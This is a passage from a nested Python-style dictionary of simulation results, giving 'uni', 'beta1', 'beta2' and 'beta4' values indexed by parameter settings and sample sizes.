0.7404913706816707, 'beta4': [0.04268820403356018, 1.6928867889354913]}, 500: {'uni': 0.21407720814314096, 'beta1': 0.10363951921535253, 'beta2': 0.659551205149009, 'beta4': [0.05049658923489535, 1.6751311937416606]}, 400: {'uni': 0.24125970025430582, 'beta1': 0.08123246944687809, 'beta2': 0.8628937525700389, 'beta4': [0.05894238702800365, 1.5997778968369727]}, 300: {'uni': 0.22589766382811063, 'beta1': 0.09942885166527134, 'beta2': 0.7532476283115479, 'beta4': [0.04082381032197537, 1.6868673631889013]}, 200: {'uni': 0.2591850579641999, 'beta1': 0.08728773319618409, 'beta2': 0.9235193570611554, 'beta4': [0.04818549496425245, 1.6588257461274114]}, 150: {'uni': 0.2556506895317946, 'beta1': 0.0750813441904301, 'beta2': 0.7289289852709729, 'beta4': [0.03313187544593835, 1.6253850040214513]}, 100: {'uni': 0.22229774262566845, 'beta1': 0.0811448635916027, 'beta2': 0.9098362902991676, 'beta4': [0.03530222422489702, 1.5256474346104436]}, 75: {'uni': 0.2521735586774331, 'beta1': 0.09746447495069399, 'beta2': 0.7259112629043855, 'beta4': [0.03833690135899138, 1.5441263026950591]}, 50: {'uni': 0.2616930090766834, 'beta1': 0.14123441320732333, 'beta2': 0.7728043037823017, 'beta4': [0.03330514564613822, 1.4984785036564114]}, 30: {'uni': 0.3777369219546949, 'beta1': 0.3181138500578289, 'beta2': 0.8227214613274908, 'beta4': [0.0647326450741752, 1.4293026049607784]}, 20: {'uni': 0.43054757894409096, 'beta1': 0.3589568856858122, 'beta2': 0.7092031874212259, 'beta4': [0.08521969621604755, 1.3592456219745106]}, 10: {'uni': 0.7193676569866309, 'beta1': 0.654002177380139, 'beta2': 1.0551759887242254, 'beta4': [0.17405948907032012, 1.291814832800615]}}, 30: {1000: {'uni': 0.39051571889875925, 'beta1': 0.3225844223634567, 'beta2': 0.9035558894765073, 'beta4': [0.07704160115380267, 2.227381034694318]}, 750: {'uni': 0.5419984090402282, 'beta1': 0.21755538971134444, 'beta2': 0.899954144980397, 'beta4': [0.07004875190766695, 2.1477522364679]}, 500: {'uni': 0.4412079869283692, 'beta1': 0.22030317510188066, 'beta2': 0.9843616821005815, 'beta4': [0.07667967917770555, 1.9841297602015278]}, 400: {'uni': 0.5283629457513818, 'beta1': 0.2598066986086734, 'beta2': 0.8073163609237236, 'beta4': [0.06868678999251733, 2.072822244613063]}, 300: {'uni': 0.40263354028046217, 'beta1': 0.3001142440813251, 'beta2': 1.0046350150005576, 'beta4': [0.06557265592267082, 1.9586311124743965]}, 200: {'uni': 0.48134354695262954, 'beta1': 0.2392909536632273, 'beta2': 0.8273194635401119, 'beta4': [0.0581293469539461, 2.4265465242403392]}, 150: {'uni': 0.4319884313883664, 'beta1': 0.2294040890895637, 'beta2': 1.1418184324337164, 'beta4': [0.0571712560341279, 1.961245075770029]}, 100: {'uni': 0.41615600361788385, 'beta1': 0.26525536184211057, 'beta2': 1.079616181101069, 'beta4': [0.056515735143493694, 1.931223027967923]}, 75: {'uni': 0.5236506770132945, 'beta1': 0.4363272030509452, 'beta2': 0.8886165139035214, 'beta4': [0.07388529678184698, 2.1557067095437286]}, 50: {'uni': 0.6456493007017982, 'beta1': 0.2258459736242775, 'beta2': 0.9869185679088074, 'beta4': [0.07918643195511797, 1.769894900611441]}, 30: {'uni': 0.6312440269318761, 'beta1': 0.3874385917123824, 'beta2': 1.0616086354633982, 'beta4': [0.05954207845456959, 1.7604364861764141]}, 20: {'uni': 0.6104126181929235, 'beta1': 0.44559241884185424, 'beta2': 1.0365435872862463, 'beta4': [0.08444149538359204, 1.7089844645029653]}, 10: {'uni': 0.8451737140836733, 'beta1': 0.6917216817713429, 'beta2': 1.1455529117074295, 'beta4': [0.16205765465380548, 1.5093854292414484]}}, 20: {1000: {'uni': 0.8509864153912471, 'beta1': 0.5927515923267968, 'beta2': 1.354526814588536, 'beta4': [0.10563809568972533, 2.780136454569248]}, 750: {'uni': 0.7237563241854266, 'beta1': 0.4880530526732574, 'beta2': 1.3754270885330822, 'beta4': [0.11608747683938342, 2.3901377175273506]}, 500: {'uni': 0.7349098763088299, 'beta1': 0.77443020708596, 'beta2': 1.2995200030374383, 'beta4': [0.08306485481040625, 2.6259561040708594]}, 400: {'uni': 0.7638265439803422, 'beta1': 0.6462529311821992, 'beta2': 1.365105079340537, 'beta4': [0.0805276337368694, 2.9074523976944744]}, 300: {'uni': 0.6816219037194299, 'beta1': 0.9804111288462322, 'beta2': 1.3313766997426972, 'beta4': [0.10612186307108695, 2.3843697448899444]}, 200: {'uni': 0.5998893893985328, 'beta1': 0.5778379418103702, 'beta2': 1.396354902148294, 'beta4': [0.08999830370109724, 2.4110667278922406]}, 150: {'uni': 0.797984421533202, 'beta1': 0.7635119755558982, 'beta2': 1.187222514137199, 'beta4': [0.10856175212215503, 2.247413871208628]}, 100: {'uni': 0.8434139646946303, 'beta1': 0.5937542903575364, 'beta2': 1.6481711418029505, 'beta4': [0.10151763893978771, 2.2184136229062994]}, 75: {'uni': 0.7748853594262961, 'beta1': 0.664001314818624, 'beta2': 1.2569773830418571, 'beta4': [0.08736838782029115, 2.443966471445661]}, 50: {'uni': 0.6555728754658805, 'beta1': 0.9684915231136594, 'beta2': 1.2968657616883206, 'beta4': [0.10161338208896606, 2.182760554868553]}, 30: {'uni': 0.7083642351575556, 'beta1': 0.6515567893677615, 'beta2': 1.5238104034879336, 'beta4': [0.0947380293078371, 2.1689469958482914]}, 20: {'uni': 0.7698390858433307, 'beta1': 0.475054994726419, 'beta2': 1.2097144464959995, 'beta4': [0.1081789146585546, 1.9020833213197117]}, 10: {'uni': 0.7904674928158877, 'beta1': 0.949332463180755, 'beta2': 1.2485380080685293, 'beta4': [0.16929713985789144, 1.7918637142720673]}}, 10: {1000: {'uni': 2.020480490053906, 'beta1': 7.10721041709354, 'beta2': 2.5389968592417067, 'beta4': [0.18067848144370124, 4.323777699457079]}, 750: {'uni': 1.8352667947476462, 'beta1': 2.6434476210102633, 'beta2': 2.2530690225728245, 'beta4': [0.1947084612587166, 5.370382453225991]}, 500: {'uni': 3.4985999712865055, 'beta1': 2.6981020235784237, 'beta2': 2.7496782818831824, 'beta4': [0.17891534759810027, 4.506976439308247]}, 400: {'uni': 1.833890959291033, 'beta1': 3.4840986435598715, 'beta2': 2.6642714750900427, 'beta4': [0.2058070804280337, 6.517500096750502]}, 300: {'uni': 2.0147647645387217, 'beta1': 2.7229813555334967, 'beta2': 4.346111089370431, 'beta4': [0.1782410384933214, 4.701824532323007]}, 200: {'uni': 1.7663283518203157, 'beta1': 3.11879869260279, 'beta2': 2.540152495390496, 'beta4': [0.2166114012627128, 4.820017824394071]}, 150: {'uni': 2.0095640832399875, 'beta1': 2.9419595624093864, 'beta2': 2.724688157226053, 'beta4': [0.17215587940898358, 4.66355299910067]}, 100: {'uni': 2.4042834119544807, 'beta1': 2.352950768311206, 'beta2': 2.2814604833627694, 'beta4': [0.18527457231348213, 4.377326443901522]}, 75: {'uni': 2.716863274826222, 'beta1': 4.822313759516299, 'beta2': 2.6674769462538004, 'beta4': [0.21543589699842206, 4.108384140007609]}, 50: {'uni': 2.2468730444488623, 'beta1': 3.483152730839255, 'beta2': 2.568146356363349, 'beta4': [0.16002210596292038, 5.625984340312313]}, 30: {'uni': 2.3701381561805053, 'beta1': 3.3219273109798197, 'beta2': 3.9081160898211027, 'beta4': [0.21947288024784048, 3.484919952253338]}, 20: {'uni': 2.106479401491252, 'beta1': 3.476826223442542, 'beta2': 2.6443039958807697, 'beta4': [0.1931791291006743, 3.2904139525762433]}, 10: {'uni': 1.7163313859785951, 'beta1': 3.4176017442346387, 'beta2': 2.1443609804377814, 'beta4': [0.202020846365801, 3.0372515442974857]}}}, 0.005: {1000: {1000: {'uni': 0.014328099280717366, 'beta1': 0.0004919534897684268, 'beta2': 0.26507968432654655, 'beta4': [0.001982857431591232, 1.071207340663885]}, 750: {'uni': 0.014645931102658792, 'beta1': 0.0004516767324158777, 'beta2': 0.28135025385035284, 'beta4': [0.0023819938907576168, 1.0710979644235907]}, 500: {'uni': 0.0401999123504932, 'beta1': 0.0010098622206039503, 'beta2': 0.26087040771294423, 'beta4': [0.00391322292956706, 1.0602707743351634]}, 400: {'uni': 0.03859906062661561, 'beta1': 0.0023951491974352618, 'beta2': 0.325410845646177, 'beta4': [0.00431194717597686, 1.0539406068541854]}, 300: {'uni': 0.03961135602832819, 'beta1': 0.004463024128966381, 'beta2': 0.30654953459515155, 'beta4': [0.005887885874932361, 1.0495105539340337]}, 200: {'uni': 0.05328322862904386, 'beta1': 0.00695816954383936, 'beta2': 0.3584887819400396, 'beta4': [0.010031906426799495, 1.0394763617108735]}, 150: {'uni': 0.07991070685839313, 'beta1': 0.01096956639776533, 'beta2': 0.38432269776431915, 'beta4': [0.014212643491827315, 1.035714483334916]}, 100: {'uni': 0.11547898783798272, 'beta1': 0.024911803431916877, 'beta2': 0.4413911056397121, 'beta4': [0.020223936999933474, 1.0295365432573114]}, 75: {'uni': 0.14278860827610332, 'beta1': 0.04111931346005935, 'beta2': 0.48247323124440955, 'beta4': [0.024508730748380864, 1.028521101035791]}, 50: {'uni': 0.22244005356502672, 'beta1': 0.10076678543802904, 'beta2': 0.53887818521626, 'beta4': [0.04406731062769291, 1.0253494243999786]}, 30: {'uni': 0.3457199293022066, 'beta1': 0.18111907291977847, 'beta2': 0.6489180152254685, 'beta4': [0.06329946927410347, 1.0186691429238954]}, 20: {'uni': 0.4321639624206314, 'beta1': 0.31930093433284834, 'beta2': 0.6968358057547454, 'beta4': [0.08748917387005273, 1.0148628000802158]}, 10: {'uni': 0.7535607617244571, 'beta1': 0.6459185759652024, 'beta2': 0.8404608212786704, 'beta4': [0.14874100748788613, 1.0103627959113197]}}, 750: {1000: {'uni': 0.016054643834592864, 'beta1': 0.0005255210796136057, 'beta2': 0.29613016022578065, 'beta4': [0.002569321458361536, 1.0921977757609453]}, 750: {'uni': 0.017565449609493463, 'beta1': 0.00044128146494429657, 'beta2': 0.32596319569610427, 'beta4': [0.0024211193229798614, 1.0837247325988582]}, 500: {'uni': 0.025273388585714537, 'beta1': 0.0012238909965949832, 'beta2': 0.28596633888810613, 'beta4': [0.004706891079404562, 1.0763363258243404]}, 400: {'uni': 0.0284869706662805, 'beta1': 0.003373431089387849, 'beta2': 0.31160773879605275, 'beta4': [0.004778217415687074, 1.0688815827153706]}, 300: {'uni': 0.051974911880818334, 'beta1': 0.0025953674653235816, 'beta2': 0.35487660596973497, 'beta4': [0.0057040189841521954, 1.0645206895209334]}, 200: {'uni': 0.057787227888696155, 'beta1': 0.008594698361171204, 'beta2': 0.33464364516433065, 'beta4': [0.008915943193690542, 1.058535030341485]}, 150: {'uni': 0.1072577046248855, 'beta1': 0.008954930631785816, 'beta2': 0.3547962531903187, 'beta4': [0.014926190566390659, 1.0451050889459255]}, 100: {'uni': 0.10866795713543598, 'beta1': 0.021365150417910553, 'beta2': 0.408057891802109, 'beta4': [0.01995689778854479, 1.0427691805903552]}, 75: {'uni': 0.1515930948295423, 'beta1': 0.0471416864069456, 'beta2': 0.4622290961298072, 'beta4': [0.033113111249531646, 1.0347147013802995]}, 50: {'uni': 0.22238209797127031, 'beta1': 0.09411440367183642, 'beta2': 0.5492704161662795, 'beta4': [0.04003882098404763, 1.03710679974761]}, 30: {'uni': 0.36495749036912684, 'beta1': 0.20588432683378366, 'beta2': 0.63948653203891, 'beta4': [0.053653553378636976, 1.0243617060340924]}, 20: {'uni': 0.4884959323661349, 'beta1': 0.30666472361293534, 'beta2': 0.7081435215673421, 'beta4': [0.07540684280791501, 1.020569046057047]}, 10: {'uni': 0.6968386619986449, 'beta1': 0.6811799241679843, 'beta2': 0.8553586319565165, 'beta4': [0.15249709600683814, 1.0142223850662149]}}, 500: {1000: {'uni': 0.02390920295425466, 'beta1': 0.0010562525829358833, 'beta2': 0.28768678189795666, 'beta4': [0.004312024387535537, 1.1489861120864775]}, 750: {'uni': 0.02364967452116205, 'beta1': 0.0013663794051884156, 'beta2': 0.3059833791245982, 'beta4': [0.0037397623064582357, 1.125354161378425]}, 500: {'uni': 0.027171446923213848, 'beta1': 0.0014895968977017358, 'beta2': 0.32175550025195343, 'beta4': [0.004058092086363399, 1.1107301691353542]}, 400: {'uni': 0.03183194238950928, 'beta1': 0.0020434543150262266, 'beta2': 0.31271219509470577, 'beta4': [0.004795694763576324, 1.1285307153481872]}, 300: {'uni': 0.03915870533550215, 'beta1': 0.002891114208307802, 'beta2': 0.3374659826961455, 'beta4': [0.009481642046035186, 1.1000575313033538]}, 200: {'uni': 0.05918013749289809, 'beta1': 0.00571396543076984, 'beta2': 0.3642424794285678, 'beta4': [0.008165969887847468, 1.0779103780685995]}, 150: {'uni': 0.08913468389043425, 'beta1': 0.013857796694830497, 'beta2': 0.36670305795462654, 'beta4': [0.013510229542809978, 1.0704422729330318]}, 100: {'uni': 0.10962684237002224, 'beta1': 0.025601470186866964, 'beta2': 0.41964378122965873, 'beta4': [0.02140079956143495, 1.0615497788178276]}, 75: {'uni': 0.16410321919833215, 'beta1': 0.036565104170381946, 'beta2': 0.4483370318574912, 'beta4': [0.025341038030251152, 1.0519482474243165]}, 50: {'uni': 0.23214158365024107, 'beta1': 0.07759808681388385, 'beta2': 0.5409699810844546, 'beta4': [0.03698440051989314, 1.045002808918023]}, 30: {'uni': 0.36866261035341547, 'beta1': 0.1615745284530632, 'beta2': 0.6000774443252743, 'beta4': [0.06503567790681813, 1.036549927349429]}, 20: {'uni': 0.5142807096062043, 'beta1': 0.3709377892635338, 'beta2': 0.6687577103009485, 'beta4': [0.09190174832036048, 1.0294336844120058]}, 10: {'uni': 0.6676276934998603, 'beta1': 0.6031823674458175, 'beta2': 0.8504156545798995, 'beta4': [0.15410271127453445, 1.0248849403515385]}}, 400: {1000: {'uni': 0.02893756653890583, 'beta1': 0.0024708098532196816, 'beta2': 0.35317007637931086, 'beta4': [0.005840162737584066, 1.1458782759009223]}, 750: {'uni': 0.029772953579492705, 'beta1': 0.0025813101021306246, 'beta2': 0.33581836617716804, 'beta4': [0.00515663755940367, 1.1544432713432045]}, 500: {'uni': 0.026373683744683594, 'beta1': 0.0012817539679130607, 'beta2': 0.3206528709629913, 'beta4': [0.006340143273613668, 1.1259949309060133]}, 400: {'uni': 0.028870605255494165, 'beta1': 0.0017583836928871455, 'beta2': 0.3345485197465399, 'beta4': [0.0049145410619623065, 1.1313262140962277]}, 300: {'uni': 0.037631574659545766, 'beta1': 0.003314104667762801, 'beta2': 0.3739031457830798, 'beta4': [0.006628311781369157, 1.1244848630571982]}, 200: {'uni': 0.05818960792147371, 'beta1': 0.006414447500778574, 'beta2': 0.34785104123458455, 'beta4': [0.010347124650326254, 1.1055988963642294]}, 150: {'uni': 0.06686629124379927, 'beta1': 0.010473443536135857, 'beta2': 0.3711187401000779, 'beta4': [0.01737674940997798, 1.0894763594747867]}, 100: {'uni': 0.11042615577766349, 'beta1': 0.021440842781902242, 'beta2': 0.4194431482280291, 'beta4': [0.020167807881497756, 1.0720999951903198]}, 75: {'uni': 0.17234535024501574, 'beta1': 0.04888178853521142, 'beta2': 0.44258791900978556, 'beta4': [0.024666584013382783, 1.0724976966026734]}, 50: {'uni': 0.20747390135121996, 'beta1': 0.10412610029786912, 'beta2': 0.5214455501618365, 'beta4': [0.03647333118409969, 1.054845362239509]}, 30: {'uni': 0.323080761682041, 'beta1': 0.1910703286553347, 'beta2': 0.5895460490280188, 'beta4': [0.07318268072463806, 1.047335158479478]}, 20: {'uni': 0.425104439432341, 'beta1': 0.31288400955871687, 'beta2': 0.660810228645866, 'beta4': [0.09528909385922078, 1.0367863357961702]}, 10: {'uni': 0.7978419703610078, 'beta1': 0.6535599792905803, 'beta2': 0.8606946260002006, 'beta4': [0.1559615213065441, 1.0262921049491547]}}, 300: {1000: {'uni': 0.03617128520734348, 'beta1': 0.005295932115668975, 'beta2': 0.3953652729378721, 'beta4': [0.0077996963164763365, 1.198423568016775]}, 750: {'uni': 0.03370212655005886, 'beta1': 0.003406479786029501, 'beta2': 0.33283985486640805, 'beta4': [0.006246338063993741, 1.1688992556321924]}, 500: {'uni': 0.03733598381117172, 'beta1': 0.002690213582744608, 'beta2': 0.32679970881106063, 'beta4': [0.0072746227056809725, 1.1815977716399453]}, 400: {'uni': 0.037609473359047664, 'beta1': 0.0030367027449007575, 'beta2': 0.31301244809282824, 'beta4': [0.007004909388070732, 1.1535355373438279]}, 300: {'uni': 0.04866436408185673, 'beta1': 0.005036968714659069, 'beta2': 0.39337778376104543, 'beta4': [0.006593818546016198, 1.1471357754823057]}, 200: {'uni': 0.06691519284441158, 'beta1': 0.012088429889848653, 'beta2': 0.411545693440886, 'beta4': [0.00925915149648542, 1.1467683642662987]}, 150: {'uni': 0.08013870806087241, 'beta1': 0.012928591505765686, 'beta2': 0.3639915988699613, 'beta4': [0.013545098748925637, 1.112941475607728]}, 100: {'uni': 0.11915204806596211, 'beta1': 0.020560796608724338, 'beta2': 0.43513333320171427, 'beta4': [0.024870502434082297, 1.101010773135631]}, 75: {'uni': 0.15380764367109265, 'beta1': 0.052743721971365606, 'beta2': 0.477437577043614, 'beta4': [0.025753188654213978, 1.096656178793653]}, 50: {'uni': 0.21634860989228755, 'beta1': 0.10387426914262873, 'beta2': 0.5267676741342504, 'beta4': [0.0336359638147702, 1.0756656338476558]}, 30: {'uni': 0.329104913600056, 'beta1': 0.2119333657379465, 'beta2': 0.5795669522760784, 'beta4': [0.05880821427631558, 1.0573282739845435]}, 20: {'uni': 0.4440546212288396, 'beta1': 0.33225105400565214, 'beta2': 0.7033791372197638, 'beta4': [0.09446679633215929, 1.0452682420079284]}, 10: {'uni': 0.6700468460734627, 'beta1': 0.6423991037463385, 'beta2': 0.8209898707066139, 'beta4': [0.14614716121509172, 1.0368350386240601]}}, 200: {1000: {'uni': 0.055678760865024414, 'beta1': 0.007958611327107352, 'beta2': 0.3616812080853317, 'beta4': [0.009650760728049683, 1.2737715811614496]}, 750: {'uni': 0.06253429328064883, 'beta1': 0.007052014486479158, 'beta2': 0.3727602445915611, 'beta4': [0.013907566868759703, 1.2455156544743298]}, 500: {'uni': 0.056629728333709814, 'beta1': 0.007236990383308722, 'beta2': 0.4378412955709138, 'beta4': [0.008915720861055711, 1.2396638343497217]}, 400: {'uni': 0.06557818408133465, 'beta1': 0.008559725754195417, 'beta2': 0.4022416830536871, 'beta4': [0.008720624487697483, 1.2242496161641432]}, 300: {'uni': 0.055653765135356484, 'beta1': 0.010716858079046102, 'beta2': 0.40777043770500154, 'beta4': [0.013037868268656936, 1.1945048646946044]}, 200: {'uni': 0.07406809444327488, 'beta1': 0.00871994028403354, 'beta2': 0.43397543608537975, 'beta4': [0.010133665874696609, 1.183136623171022]}, 150: {'uni': 0.07579453587538967, 'beta1': 0.016690794496607576, 'beta2': 0.38707637478822926, 'beta4': [0.012003777291769832, 1.1607492057108946]}, 100: {'uni': 0.1330117692754952, 'beta1': 0.0273137396681669, 'beta2': 0.4639958863729501, 'beta4': [0.01718866277831865, 1.1529289387642288]}, 75: {'uni': 0.16284219430179553, 'beta1': 0.05374597722028761, 'beta2': 0.46276207823889204, 'beta4': [0.0212354062721255, 1.1433215554102738]}, 50: {'uni': 0.21676977749720733, 'beta1': 0.10705646819292171, 'beta2': 0.4962386395407797, 'beta4': [0.0424490148625437, 1.106642687778397]}, 30: {'uni': 0.3232291639799789, 'beta1': 0.21990639926403363, 'beta2': 0.6287500118287891, 'beta4': [0.06227333917623599, 1.0852347913639224]}, 20: {'uni': 0.4741588995975893, 'beta1': 0.3180055211757256, 'beta2': 0.6997497503888488, 'beta4': [0.08910550204088843, 1.073553657215182]}, 10: {'uni': 0.7060034832794384, 'beta1': 0.7535719832598702, 'beta2': 0.836970960678481, 'beta4': [0.15463124862968708, 1.061123889701544]}}, 150: {1000: {'uni': 0.09755029708902496, 'beta1': 0.013371380424273176, 'beta2': 0.4904883791446505, 'beta4': [0.014485120313771681, 1.3263298856392054]}, 750: {'uni': 0.07935627239599896, 'beta1': 0.014498726584143962, 'beta2': 0.4032213903162674, 'beta4': [0.01453548924940545, 1.312319935889472]}, 500: {'uni': 0.07940335531678129, 'beta1': 0.013532193951838856, 'beta2': 0.43737767914012077, 'beta4': [0.012086410300407132, 1.292089639338192]}, 400: {'uni': 0.08510558470918518, 'beta1': 0.013814146505550512, 'beta2': 0.4322597292778953, 'beta4': [0.011514722775333443, 1.2679672672520583]}, 300: {'uni': 0.07050546141892267, 'beta1': 0.013721651466435995, 'beta2': 0.4772443440959037, 'beta4': [0.013048563921660452, 1.275168506879035]}, 200: {'uni': 0.07212522306921464, 'beta1': 0.014794794920315857, 'beta2': 0.4182389641782459, 'beta4': [0.012330051449758477, 1.223055546001289]}, 150: {'uni': 0.0880530466181019, 'beta1': 0.01637038391386567, 'beta2': 0.4016620386283008, 'beta4': [0.015981031730102176, 1.2058441135701794]}, 100: {'uni': 0.10437092139348636, 'beta1': 0.042125959393999324, 'beta2': 0.4180395651716391, 'beta4': [0.018238525075653742, 1.1892200376979478]}, 75: {'uni': 0.1354097789470845, 'beta1': 0.04466340448885708, 'beta2': 0.4719502510414126, 'beta4': [0.029031453045082974, 1.1842822424503554]}, 50: {'uni': 0.2321223950706905, 'beta1': 0.1000673436975513, 'beta2': 0.5419923580903283, 'beta4': [0.04560941534187873, 1.1404594681712081]}, 30: {'uni': 0.3398043685756915, 'beta1': 0.20164768345364828, 'beta2': 0.5973341709232525, 'beta4': [0.05850641234359622, 1.1190533719391869]}, 20: {'uni': 0.42530652623250753, 'beta1': 0.33972887071420993, 'beta2': 0.6661734761601139, 'beta4': [0.0866818884666435, 1.1036146702573584]}, 10: {'uni': 0.7206486942031576, 'beta1': 0.6682818489256517, 'beta2': 0.8203819752573837, 'beta4': [0.1457856061570244, 1.0782841756806698]}}, 100: {1000: {'uni': 0.12225970876711711, 'beta1': 0.026865924786776484, 'beta2': 0.5481932843224591, 'beta4': [0.021249975024392645, 1.4458803198625023]}, 750: {'uni': 0.10432288378851975, 'beta1': 0.01938410759360099, 'beta2': 0.5174008910203534, 'beta4': [0.020650675251219643, 1.400096753320331]}, 500: {'uni': 0.10980786444942221, 'beta1': 0.046045147980126745, 'beta2': 0.4872619282673519, 'beta4': [0.020216014505271482, 1.34415766866211]}, 400: {'uni': 0.11830943122090917, 'beta1': 0.022610702506398205, 'beta2': 0.48432204455605576, 'beta4': [0.020746831022585423, 1.3579130782794564]}, 300: {'uni': 0.1301564606268183, 'beta1': 0.03017686908257779, 'beta2': 0.49504127235180784, 'beta4': [0.017718462476249502, 1.3626289526025477]}, 200: {'uni': 0.10317650157447253, 'beta1': 0.031018838197086084, 'beta2': 0.5827841182143911, 'beta4': [0.01835643401415011, 1.3438136723439953]}, 150: {'uni': 0.1223846100192758, 'beta1': 0.029879335127678274, 'beta2': 0.5409671366968559, 'beta4': [0.01954089865119265, 1.368437090606529]}, 100: {'uni': 0.12961477120291165, 'beta1': 0.03162701397748519, 'beta2': 0.5639520142257836, 'beta4': [0.017002122681775672, 1.3145981538380391]}, 75: {'uni': 0.17353671304347995, 'beta1': 0.047537565730464616, 'beta2': 0.5761043512638573, 'beta4': [0.027716532256132305, 1.2441854959216505]}, 50: {'uni': 0.24826276887242338, 'beta1': 0.08558962844244324, 'beta2': 0.533915471627432, 'beta4': [0.03863914801170205, 1.218517497159898]}, 30: {'uni': 0.37180952980211535, 'beta1': 0.21095614373881763, 'beta2': 0.6001047101242712, 'beta4': [0.055670631983699946, 1.2205675047970168]}, 20: {'uni': 0.5332463734790038, 'beta1': 0.3122699052968921, 'beta2': 0.6825479362346901, 'beta4': [0.1007635027564815, 1.1578526542019671]}, 10: {'uni': 0.7827438334815844, 'beta1': 0.667689009954351, 'beta2': 0.8475596342444666, 'beta4': [0.14486763242884407, 1.141064060957981]}}, 75: {1000: {'uni': 0.13934776917850505, 'beta1': 0.03613172510974446, 'beta2': 0.5412943561883247, 'beta4': [0.027239243280109772, 1.4730726636218179]}, 750: {'uni': 0.16768552393257194, 'beta1': 0.04411635102462327, 'beta2': 0.5665863137587445, 'beta4': [0.026435978717218058, 1.50426942823365]}, 500: {'uni': 0.24455944319130382, 'beta1': 0.05406680626221278, 'beta2': 0.5394359340277001, 'beta4': [0.027135290145289204, 1.5051667579504118]}, 400: {'uni': 0.15461074078236603, 'beta1': 0.05661127214288521, 'beta2': 0.5887256535284988, 'beta4': [0.03600603252919621, 1.478513973879563]}, 300: {'uni': 0.1920855608409181, 'beta1': 0.03925990146874738, 'beta2': 0.630763663206618, 'beta4': [0.025894458672085747, 1.4794655207279226]}, 200: {'uni': 0.1591107285954601, 'beta1': 0.04254459738815162, 'beta2': 0.6307198306870676, 'beta4': [0.02985877018033198, 1.530765493767434]}, 150: {'uni': 0.14590438734222005, 'beta1': 0.04466619164761486, 'beta2': 0.6173909230664805, 'beta4': [0.026438835998575785, 1.5522769250395467]}, 100: {'uni': 0.16386720848409753, 'beta1': 0.034581214946180605, 'beta2': 0.6435260478502861, 'beta4': [0.02156809827287651, 1.3310952312116713]}, 75: {'uni': 0.2051974936490455, 'beta1': 0.04438683443429087, 'beta2': 0.7570265710330468, 'beta4': [0.02519624884405606, 1.3151982531497861]}, 50: {'uni': 0.24755928104164165, 'beta1': 0.07941075920923452, 'beta2': 0.5523721622394626, 'beta4': [0.032146481769480144, 1.3112402606407734]}, 30: {'uni': 0.31261585515906276, 'beta1': 0.18074582175361859, 'beta2': 0.7859291996037391, 'beta4': [0.06990167942655667, 1.2489639807507744]}, 20: {'uni': 0.47757757711804133, 'beta1': 0.3892655220378294, 'beta2': 0.65429188208398, 'beta4': [0.07124185190053445, 1.20898602562413]}, 10: {'uni': 0.758938135412502, 'beta1': 0.6071917038027647, 'beta2': 0.8133960727391841, 'beta4': [0.1418543707432124, 1.172110809011133]}}, 50: {1000: {'uni': 0.2519872356069227, 'beta1': 0.09956789513840078, 'beta2': 0.5973602366915676, 'beta4': [0.03557118792760849, 1.846420958350958]}, 750: {'uni': 0.22274951858723938, 'beta1': 0.14482781845510667, 'beta2': 0.6178955775749804, 'beta4': [0.03823593411101681, 1.6198382539682874]}, 500: {'uni': 0.28071600405504815, 'beta1': 0.09158498231032232, 'beta2': 0.7997535279942787, 'beta4': [0.04163171710115897, 1.650963554921299]}, 400: {'uni': 0.2922089526616882, 'beta1': 0.11759396626445189, 'beta2': 0.7731995739049791, 'beta4': [0.037647902544816, 1.7656229411142739]}, 300: {'uni': 0.25418399430527083, 'beta1': 0.13751569298349953, 'beta2': 0.7573774424984173, 'beta4': [0.05931918746259869, 1.7791282172821952]}, 200: {'uni': 0.23531715081630106, 'beta1': 0.11068962000304736, 'beta2': 0.6622845585879117, 'beta4': [0.03585546142253086, 1.6847743436735174]}, 150: {'uni': 0.2571656578305455, 'beta1': 0.0990487380070637, 'beta2': 0.9408378093466124, 'beta4': [0.04508196722079799, 1.6238817123606337]}, 100: {'uni': 0.30195245498224216, 'beta1': 0.12530632794125562, 'beta2': 0.791776346980489, 'beta4': [0.03925044382813762, 1.4734408851271226]}, 75: {'uni': 0.22035812392432402, 'beta1': 0.07800979369300794, 'beta2': 0.842860198671106, 'beta4': [0.03637344064264452, 1.549853109016985]}, 50: {'uni': 0.22701572090938457, 'beta1': 0.09633906028439704, 'beta2': 0.7417429467761041, 'beta4': [0.03967152130862653, 1.4208398087842706]}, 30: {'uni': 0.34305046792602056, 'beta1': 0.19457807203493765, 'beta2': 0.7688470256335644, 'beta4': [0.054957912588768955, 1.360607831613779]}, 20: {'uni': 0.44028196804498093, 'beta1': 0.3293466137962002, 'beta2': 0.8955070612796764, 'beta4': [0.08742726496427163, 1.3095948825783168]}, 10: {'uni': 0.7699134066893929, 'beta1': 0.6638012059398908, 'beta2': 0.8293763559338202, 'beta4': [0.16302206868052743, 1.255835042638528]}}, 30: {1000: {'uni': 0.3783603182203987, 'beta1': 0.2985135916574845, 'beta2': 0.8480133889666746, 'beta4': [0.07400878504174886, 1.8720458507484417]}, 750: {'uni': 0.4154933226222209, 'beta1': 0.24934139997421964, 'beta2': 1.160778307881534, 'beta4': [0.07685054947159019, 2.044210757725545]}, 500: {'uni': 0.550909588495024, 'beta1': 0.2313146347432924, 'beta2': 0.936385734064073, 'beta4': [0.07048754696750378, 1.9792386217682503]}, 400: {'uni': 0.5076547857886943, 'beta1': 0.32364070076843526, 'beta2': 0.828794665169518, 'beta4': [0.05552868809465391, 2.13369982878608]}, 300: {'uni': 0.4212091415576435, 'beta1': 0.6407736056430736, 'beta2': 1.0918478367941438, 'beta4': [0.06705773137193753, 2.183556190312245]}, 200: {'uni': 0.5222535142935859, 'beta1': 0.25665396488998615, 'beta2': 0.9107840939614209, 'beta4': [0.06654571092334242, 1.805631337994444]}, 150: {'uni': 0.43316941974778084, 'beta1': 0.20792026635549665, 'beta2': 0.9315624660996159, 'beta4': [0.08392298669805384, 1.8279786709160393]}, 100: {'uni': 0.4390903940116475, 'beta1': 0.23112811858430285, 'beta2': 1.1529115982571578, 'beta4': [0.06978068315817124, 1.991075733195905]}, 75: {'uni': 0.4108132941809196, 'beta1': 0.3623491730750028, 'beta2': 0.987753882594803, 'beta4': [0.06674754238444675, 1.840030509070244]}, 50: {'uni': 0.43236438562108004, 'beta1': 0.26646388556150524, 'beta2': 1.1050012918364582, 'beta4': [0.07546899560971876, 1.7970124808313264]}, 30: {'uni': 0.48845354994614554, 'beta1': 0.2512856894263626, 'beta2': 1.0020051752860113, 'beta4': [0.05853483814283524, 1.6209383322431605]}, 20: {'uni': 0.46205240371135886, 'beta1': 0.33039091692066247, 'beta2': 0.8763727543362038, 'beta4': [0.08506956671611077, 1.6253602089503376]}, 10: 